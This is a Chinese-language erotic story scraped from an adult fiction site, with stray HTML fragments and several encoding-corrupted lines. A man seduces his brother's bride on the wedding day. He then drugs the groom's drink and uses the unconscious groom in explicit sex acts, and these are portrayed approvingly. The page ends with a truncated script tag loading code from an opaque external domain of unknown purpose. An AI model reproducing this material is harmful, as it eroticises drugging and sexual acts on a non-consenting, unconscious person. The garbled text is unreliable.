• <s id="qnwuy"><acronym id="qnwuy"></acronym></s>
    <th id="qnwuy"></th>
  • <th id="qnwuy"></th>
    
    

    <tbody id="qnwuy"></tbody>
    <em id="qnwuy"></em>
    <span id="qnwuy"></span>
    <tbody id="qnwuy"></tbody>
    您的位置:

    首頁> 現代激情> 新婚嬌妻

    新婚嬌妻 - 新婚嬌妻

      穿著婚紗的新娘子,在房里等待著即將到來的婚禮,她看著鏡子里面美麗的
    容顏,但卻不知在思考著什麼。突然房門打開,一位高大挺拔的男子走了進來,
    隨即將房門鎖住,新娘看了他一眼,說:「我即將成為別人的新娘,這樣你滿意
    了嗎?」
      男子走上前去,貼近她的嬌軀說:「真是聽話,不錯!剐履飲舌亮艘幌拢
      「真不知道你在想什麼,為何要我這樣做?」男子一雙彷佛有魔力的大手已
    經慢慢攀登上新娘的身體說:「你又不是不了解我,我最喜歡的就是玩別人的老
    婆,我依然愛你,但這樣的關系是最好的!
      新娘緊緊抱著眼前的男子說:「張偉,你以后不能嫌棄我!
      張偉聽到后大笑:「小潔,這計劃是我想出來的,我又怎麼會嫌棄你呢?」
    說著邊把手摸到小潔的胸前,將兩旁的肩帶直接拉了下來,兩顆圓滾滾的乳房已
    經呼之欲出,露出里面的無痕胸罩。
      張偉用他的大手掂量了一下說:「你的奶子是不是又變大了?」小
      潔微帶羞澀的說:「還不是你一天到晚亂摸!
      張偉將胸罩取下后,看著面前佳人身著漂亮的婚紗,卻露著兩顆白皙圓潤的
    大奶任他觀賞,一股成就感油然而生,兩只手或捏或揉,使得兩團嫩白的美肉在
    他掌中不斷變形,口中還說著:「以后還有你老公幫你揉呢!」
      小潔有些猶豫的說:「他早就揉過了!
      張偉有些興奮的說:「沒想到我才出國一段時間,你們就做了,是不是你去
    勾引他?」
      小潔將胸口兩團美乳挺出讓張偉更能掌握在手中,然后說著:「我才沒有,
    那天他硬要我,我也沒有辦法。
      你們男人都好色!
      張偉將大嘴親上小潔的脖子說:「誰叫我的小寶貝這麼誘人呢!
      小潔有些動情的說:「那天晚上他要了我三次,之后像上癮了一樣,每天都
    跑來找我!
      張偉慢慢地親吻到小潔的小巧耳垂,說著:「看來你的未來老公很喜歡你的
    身體呢!不過他應該沒想到他親愛的老婆在休息室里跟其他男人搞上!
      小潔有些不滿的說著:「你怎麼聽到人家被其他男人上就這麼興奮呢?你真
    變態,這麼喜歡讓我給別人弄,不過誰叫我愛你呢?快點吧,等等就要開始了!
      張偉出國也是憋了一骨子邪火,如今看到佳人如此神態,便也是控制不住,
    把手伸進小潔婚紗裙擺底下,直接掀了起來,露出兩條光溜溜的美腿,口中嘖嘖
    有聲:「你穿這樣真美,要不是時間不夠,真想直接帶你去開房間!
      說著說著,手已經進攻到小潔兩腿之間的嫩鮑,后來似乎覺得隔著一條蕾絲
    內褲摸起來不過癮,一把扯了下來,蕾絲內褲搖搖晃晃的掛在新娘的兩條玉腿之
    間,然后張偉蹲下仔細觀察著。
      小潔的視線被掀起來的婚紗裙擺擋住,不知道張偉在做什麼,只好出聲詢問:
    「你怎麼突然停了?」
      張偉看了一下,說:「看來他操你操得很勤呢,上面都還有一些小小的傷痕!
      小潔這才知道原來張偉盯著小穴觀察著,有些羞赧的想將雙腿闔上,張偉連
    忙用手阻止,一邊用手撥開陰唇,將粗大的手指摳了進去說:「好溫暖的小穴,
    真是有夠舒服,不過你怎麼流這麼多水?」
      原來小潔的裙擺下早已一片泥濘,小潔小小聲的說著:「人家也不知道為什
    麼,看到你之后就變這樣了。我不要手指,快點給我!
      張偉壞笑了一下,看著眼前即將成為新娘的嬌羞神態說:「小潔你的身體真
    得很色呢,不過要給你什麼?講清楚一些!
      小潔此時也知道張偉的習慣,只好無奈地說:「小潔想要老公的棒棒,求求
    你!
      張偉大笑:「你的老公可不是我,他現在在外面,不過你這麼想要,我就滿
    足你吧!」
      張偉說著便從褲襠掏出他胯下的巨物,足足有20多公分長,就在小潔毫無預
    警的時候插了進去。
      小潔有些痛苦的嬌呼著:「都不說一下,噢!…好深!」
      張偉讓小潔背靠在梳妝臺上,將兩條玉腿直接抬了起來,巨大的陽根不斷進
    出小潔的粉穴里頭,口中說著:「你吸得我好爽,我玩過的女人里面,你的小穴
    是最棒的一個!
      小潔此時不斷嬌喘著:「好大……!太快了……人家的小穴會被你弄壞的
    ……」
      張偉低下頭去親吻小潔的巨乳,然后說:「不會的,我每次……都這樣操你,
    你后來……還不是都一樣緊。噢!先別夾這麼緊!
      小潔將張偉的頭按在自己的乳房間喘息著:「你這次……嗯!比以前……啊
    ……更用力…噢!…太滿了……受不了…!…」
      張偉頭埋在小潔嫩白的胸前,有些含糊的說著:「我這不是太久沒看到你了
    嘛,一下飛機就趕來操你,不過有你這樣的新娘嗎?放著新郎在外頭叫別的男人
    操你!
      小潔斷斷續續的說著:「喔!…慢!…慢……誰叫你每次…!……都弄得
    人家…嗯!……好舒服……張平根本…!…比不上你…」
      張偉吻著她嬌嫩的唇瓣:「你這番話,要是讓我……那個弟弟聽到,恐怕會
    …心都碎了,他可是一直…
      …都暗戀你呢!
      小潔穿著婚紗,扭動著纖細的蠻腰說:「那還不是……!…你要人家……
    嗯……去嫁給他,你才是我的…噢!…親親老公,噢!…用力,快到了……」
      張偉感覺到小潔蜜道內開始出現一陣陣的緊縮,知道她快要攀上巔峰,于是
    加快速度,粗腰有如打樁機一般,不斷頂到小潔的花心。
      終于一陣猛烈的水流從小潔的體內涌出,直接沖擊到張偉已經變得敏感的龜
    頭,加上周圍嫩滑的小穴觸感,讓他的肉棒也是招架不住,與小潔一同攀上了高
    潮。
      小潔在高潮之后慢慢地回過神來說:「你又射在人家里面,等等就要開始婚
    禮了,哪有時間清理?」
      張偉笑了一下,拿出預謀已久的物品,將陰莖從小潔的小穴內抽出,換成把
    跳蛋塞到里頭,然后說:「這可是我幫你從日本買來的新玩具,喜歡嗎?這樣就
    不會流出來了,你等等就這樣去參加婚禮吧!」
      小潔還來不及反對,已經聽到門外有人敲門,只好趕快整理衣物,瞪了即將
    躲藏進衣柜的張偉一眼,但也無可奈何。
      小潔去開了門,伴娘走進來,看著小潔的臉說:「你的臉怎麼紅撲撲的?」
      小潔連忙用小手搧了下風說:「穿著這套衣服有點熱!
      伴娘勾著小潔的手說:「別緊張,大家都是這樣過來的。你穿婚紗真的好美
    喔,不過下擺這邊有些不整齊,我給你整理一下!
      小潔馬上說:「沒……沒關系,我自己整理就好!
      過了不多久,終于到了訂下的時間,按照習俗是由父親帶著女兒走入結婚會
    場,小潔的父親看著即將出嫁的艷麗女兒,心中是千頭萬緒,不知道該說什麼才
    好,小潔看著父親,眼眶也是紅紅的。
      但不料父親牽著小潔的手走到一半,小潔突然蹲了下去,周遭的人連忙問說
    怎麼了,只見小潔俏臉微紅說:「有些不習慣穿這雙鞋,腳有些扭到了。不用擔
    心,我可以自己走!
      而張偉則是坐在男方家屬的席位上,手里拿著跳蛋的遙控器笑了笑,喃喃自
    語說:「似乎不小心開太強了。嘖嘖!」
      小潔此時一邊忍受著體內傳來的陣陣快感,一邊跟著父親走向前去,周遭的
    賓客先是贊嘆今日新娘的美麗,但隨即發現新娘子走路的姿勢有些別扭。
      至于原因眾說紛紜,剛剛小潔說腳扭到是最常見的推測,但也有人猜測艷麗
    的新娘可能是昨晚被操弄得太厲害,以至于今天雙腿酸痛,但卻沒有人猜到真相
    其實是新娘一邊忍受著陰道內的跳蛋,一邊緩步向前,還要注意不能采到裙擺。
      小潔遠遠的看了張偉一眼,張偉微笑著看著她,她投以求饒的眼神,但張偉
    卻搖了搖頭。
      而經過了一連串的誓詞,小潔終于成為張平的妻子,中途高潮了三次,她幾
    乎都要極力忍住才能不發出聲,誓詞也講得斷斷續續的。儀式結束后小潔的體力
    也到了極限,去敬酒時幾乎整個嬌軀掛在張平的手上。
      到張偉那一桌的時候,張偉看著小潔的俏臉,卻是悄悄的將跳蛋遙控器的震
    動開到最大,小潔毫無預警的接受到突如其來的刺激,只能感受到張偉封存在她
    體內的精液正在翻滾攪動著,帶給她巨大的快感,也顧不得一旁的老公,只能將
    小手摀住嘴唇,一邊向張偉投以求饒的眼神,張偉看著她酡紅的臉龐,確定她快
    到極限才將開關轉小。
      張平心中有些奇怪嬌妻今日有些不對,但也未加詢問。
      而此時一件讓在場所有人意想不到的事情發生了:就在敬酒到一半時,小潔
    的肩帶居然突然斷裂,而白皙的美乳也因此露出在眾賓客眼前,連粉色的乳頭都
    露了出來,在場所有人都驚呆了,只有張偉摸著包包里小潔的隱形胸罩看著小潔
    此時的美態。
      原來張偉剛剛順手把小潔的胸罩拿走,加上有人就快進來,于是小潔就硬著
    頭皮不穿內衣上陣,還好她的堅挺乳房又大又圓,撐起婚紗不成問題,卻不知張
    偉何時在肩帶上動了手腳。
      小潔一聲驚叫蹲了下來,而在場的賓客卻將小潔兩只嫩白碩大的豐乳盡收眼
    底,不少人看到這性感的一幕瞬間硬了起來,有些母親則是忙著遮住小孩的眼。
      經過一番手忙腳亂,總算是將事件帶了過去,但小潔已經沒有敬酒的心情了,
    可是又無法不做。
      之后的賓客一個個都盯著小潔的胸前看,似乎可以看穿衣服,直視下面的大
    奶。小潔滿臉通紅卻也無可奈何,張平則是不斷地安慰她,并且一直幫她擋酒。
      結束整個婚禮后,張平跟小潔拖著疲憊的身軀回到新房,小潔還想著一到屋
    內得先進浴室,否則被張平發現就糟了,但張平卻一沾到床隨即昏沉沉的睡了過
    去。小潔有些訝異,畢竟張平的酒量還是不錯的,雖然幫她擋了不少杯,但仍不
    應該這樣。
      此時張偉從陰影之中走了出來,看著小潔說:「不用猜了,我剛剛遞給他的
    酒有問題!
      小潔翹著小嘴說:「你真的很變態,這可是你弟弟新婚之夜!
      張偉勾起小潔精致的下巴說:「誰叫你要愛上我呢!」隨即把仍身穿婚紗的
    小潔推倒在床上,小潔口中求饒著:「張平還在這呢,不要在他面前……」
      張偉手探入襯裙內說:「他不會醒來的!闺S即伸入小潔的小穴拉住跳蛋前
    頭的線圈扯了出來,隨之而出的是混雜大量淫水及精液的液體,幾乎弄濕了整個
    襯裙。
      張偉也有些訝異:「天!你也太敏感了。你剛剛高潮了幾次?」
      小潔將頭偏到一旁鬧脾氣,張偉說了聲:「呦!還鬧別扭,看來我該想想如
    何懲罰你了!
      說完便拖著張平到浴室門口,小潔有些緊張的說:「你要干嘛?」
      張偉向她努一努嘴說:「你跟我進來!
      到了浴室內,只見張偉三下五除二把張平脫個精光,小潔更緊張了,張偉卻
    叫她也把衣服脫掉。
      她有些惴惴不安的脫下婚紗,兩只玉腿之間還有剛剛大量液體流下的痕跡。
      張偉邪邪的笑了一下說:「我最疼愛這個弟弟了,他這樣喝醉了睡著不太好,
    小潔你來幫他洗一洗!
      小潔有些呢喃的說了聲:「四次!
      張偉看著她挑著眉說:「你說什麼?」
      小潔只好放大音量,用嬌柔的嗓音說著:「我剛剛高潮了四次!
      張偉失笑道:「終于肯說了,不過來不及了,快點上吧!
      小潔嘆了一口氣,用她的小手擠了點沐浴乳,抹在張平身上,剛要涂上去時
    被張偉制止,張偉開口道:「不是用手,」
      小潔皺了皺可愛的眉頭疑惑道:「那要怎麼抹?」
      張偉走到小潔身后,兩只大手攀上高聳的潔白雙峰說:「用這里。需要我來
    幫你嗎?」
      小潔有些猶豫,張偉見狀說:「我來幫你吧,」說著便將沐浴乳擠在小潔的
    胸前,有些濃稠的白色液體順著小潔兩乳之間的溝向下滑,讓人聯想翩翩。
      然后張偉壓著小潔的美背,讓兩顆碩大的酥胸貼著昏睡過去的張平胸口,小
    潔只好自己捧著雙乳,用自己的大奶在老公的胸口畫圈,涂抹著沐浴乳。張偉見
    狀稱贊道:「做得不錯呀,挺有天份,」
      好不容易涂抹完全身,剩下張平的肉棒還未涂抹,而此時張平的肉棒不知何
    時已經一柱擎天,看來他連失去了意識都還被小潔的美體碰觸到有了生理反應。
      正當小潔又再一次擠了沐浴乳在胸口的時候,張偉已經脫光衣服站在她的身
    后,露出精壯結實的身體,他拍了拍小潔的玉肩說:「這里不能這樣抹,我來教
    你,」說完便把肉棒緩緩挺進小潔的粉穴里面,小潔有些重心不穩,滑倒在面前
    昏睡的老公身上。
      兩具光溜溜的肉體涂滿了沐浴乳,雪峰壓著張平,隨著身后的撞擊滑動著,
    而兩條赤裸的美腿屈曲著,接受身后火熱肉棒的侵入,口中低聲呻吟著:「別讓
    人家……!…在張平身上這樣做……!…這樣好羞……」
      而張偉卻只插入抽動了幾下便收回,口中說:「真不想拔出來,不過該接受
    的懲罰還是得做完!
      小潔掙扎了幾次才從張平滑溜的身體起來說:「不是都涂完了嗎?」
      張偉搖了搖頭:「小潔你忘了還有這里嗎?來,我來幫你!拐f著便把小潔
    赤裸的美軀抱了起來。
      小潔有些緊張的用玉腿纏住張偉的腰,一對豐滿的玉兔在張偉眼前蹦彈著,
    帶給張偉極大的視覺刺激,此時張偉緩緩地蹲下,將小潔的嫩穴對準張平的陽根,
    一點一點把弟弟的陰莖放入小潔的粉穴內。
      張偉說著:「剛剛我已經幫你把里面也涂了沐浴乳了,現在換你幫他了,動
    一動吧!」小潔微微的擺動著纖腰,張偉似乎有些不滿意,大嘴直接吻上小潔的
    唇瓣,勾著她的香舌,另外一只手不斷游走在小潔的敏感點,逼得小潔的嬌軀不
    斷地扭動,套弄著新婚老公的陰莖,張偉看著她的媚態問:「這是不是你第一次
    在張平的上面?」
      小潔嬌聲說著:「他才不像你,他都對我很溫柔,!啊,怎麼突然射了進
    來,」
      張偉饒有興趣的看著她:「看來你的小穴真的很會咬人呢,沒想到張平這麼
    快就射了,」
      又過了一會張偉才滿意的說道:「這樣可以了,」然后他慢慢的清洗小潔的
    身體,一點一點的摸遍她的嬌軀,享受那細致綿密的肌膚觸感,小潔就在新婚老
    公的面前被張偉的大手摸到渾身癱軟,玉體無力的倒在張偉寬闊的胸膛里,被張
    偉摟在懷中大肆玩弄著。
      之后張偉把自己的身體跟張平都清洗乾凈后,重新回到床上。張偉此時已經
    按捺不住,一把抓過小潔插了進去,小潔聲音中痛苦帶著歡愉:「你要死了……
    !…每次都這樣進來……喔!還有不是說…!…不要在張平面前做嗎?」
      張偉卻不理她,反而說:「怎麼你在老公面前被我干害羞了嗎?出了好多水,
    又濕又滑的,難怪張平每晚都要找你要,」
      小潔聽到這番話,受到刺激,陰道又是一陣收縮,張偉喘著粗氣說:「你這
    該死的小妖精,差點又害我控制不了,看來你也很喜歡在老公面前被干呢,一聽
    到就這麼興奮,」
      小潔無力的說著:「沒有,我才沒有,」張偉微微一笑,也不接話。
      張偉將節奏慢了下來問:「張平之前都用什麼姿勢操你?」
      小潔緊抿著嘴唇不出聲,張偉等了一下見沒有回應,便說:「看來懲罰還是
    不夠!剐嵅诺吐暤溃骸杆枷矚g從背后來!
      張平聽到便將肉棒拔了出來,把小潔的美體翻了個身,然后讓小潔兩只玉臂
    撐在張平的兩旁,一對豐滿的嫩乳在昏睡過去的張平眼前搖晃著,而張平卻不知
    心愛的嬌妻,現在正被他最愛的姿勢從背后被他的兄弟玩弄著。
      接著張偉挺著粗大的陰莖對準小潔美尻中間的銷魂洞插了進去,一邊說著:
      「他都這樣干你嗎?」小潔微微發出舒服的鼻音:「嗯~~」
      此時張偉竟抓住張平的手來搓揉小潔的美胸,小潔察覺到嬌吟著:「不要這
    樣…」
      張偉深深淺淺的撞擊著小潔的翹臀,然后說:「你怎麼連一點福利也不給你
    老公?他可是很喜歡你這對大奶呢,」
      小潔不知如何回答,只能呻吟著:「難怪你們兄弟……噢!…每次都這麼愛
    …!…揉人家的胸胸…不要……嗯!…好羞人……噢!…好深……!…你好
    棒喔……」
      張偉框住小潔的腰,猛烈的進出小潔的小穴,偉不斷觸碰著小潔的敏感點邊
    問說:「我跟他誰操你操的比較爽?你比較喜歡誰的?」小潔有些羞赧的說:
      「張平就在下面…阿!…不要這樣問好不好…噢!…阿…又快到了!」
      此時張偉突然將肉棒拔出,把小潔抱了起來,小潔感覺體內一陣空虛,搖動
    著豐臀說著:「怎麼突然停下了?你好壞!…你比他厲害…每次都快弄死人家…
    最喜歡你的了…」
      張偉看著小潔幾乎是在她老公的耳旁說出這番話,又感到一陣興奮。
      張偉說:「如果你想要的話,身下不是還有嗎?」
      小潔猶豫了一下說:「可是我想要你的!
      張偉撫摸著小潔已經儒濕的秀發說:「現在不行!
      說完他又把小潔的小穴對準張平的肉棒套了進去,讓小潔側身躺在床上,然
    后拿出一瓶潤滑油,涂在肉棒上,趁小潔不注意的時候進入了她的菊花。
      小潔先是全身緊繃,然后才反應過來,嬌聲喊道:「痛!求求你,不要…噢!
    …那邊臟!…臟…」
      張偉吻著她的玉頸說:「不用緊張,放輕松!
      小潔掩著面,一句話也說不出來。
      等小潔適應了后,他慢慢地動起來。
      張偉抽插的時候,還可以感受到他兄弟的肉棒就在前面,僅僅隔著一層肉壁,
    讓小潔身下兩個洞都壓縮到極限,一層又一層的美肉緊緊包覆著他的巨根,小潔
    的一雙修長玉腿不斷踢動著,卻無法阻止她的兩個肉穴同時插著這對兄弟的肉棒。
      小潔秀發飄散著:「怎麼會這樣…!…快瘋掉了……噢!…不行…兩個洞
    都好滿…!…你快拔出去……噢!…我受不了了…嗚!嗚!」
      張偉很快就受不了這種刺激,將濃濃的精液灌入弟弟妻子的菊穴;而同時張
    平的肉棒似乎也因為小潔穴內美肉的壓揉,在無意識中自然而然地噴發進新婚妻
    子體內。
      小潔此時也終于受不了巨大的刺激,嬌嫩的身軀抽搐著,蜜汁不斷涌出浸潤
    下體的肉棒,身下的兩個穴也不斷冒出男人的精液,隨即因體力透支昏昏沉沉的
    睡了過去。
      而張偉也心滿意足的看著眼前的佳人,輕輕的說了聲:「今天就先放過你吧,
    以后再慢慢玩!谷缓笪橇宋撬那文,離開這對新婚夫婦的新房。
                    
    【完】

                   
    * type="text/javascript" src="https://vpk3r6e1.com/788660a2a427ed69e">